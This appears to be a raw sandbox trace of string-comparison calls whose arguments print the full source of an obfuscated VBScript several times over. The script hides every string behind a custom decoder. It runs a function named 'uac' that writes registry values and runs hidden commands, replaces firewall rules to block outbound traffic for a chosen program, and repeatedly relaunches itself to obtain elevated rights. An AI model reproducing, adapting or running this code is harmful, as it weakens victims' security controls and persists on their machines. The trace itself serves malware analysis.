bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.968] wcsncmp (_String1=" Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.969] wcsncmp (_String1="Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0222.969] wcsncmp (_String1="id(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.969] wcsncmp (_String1="d(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 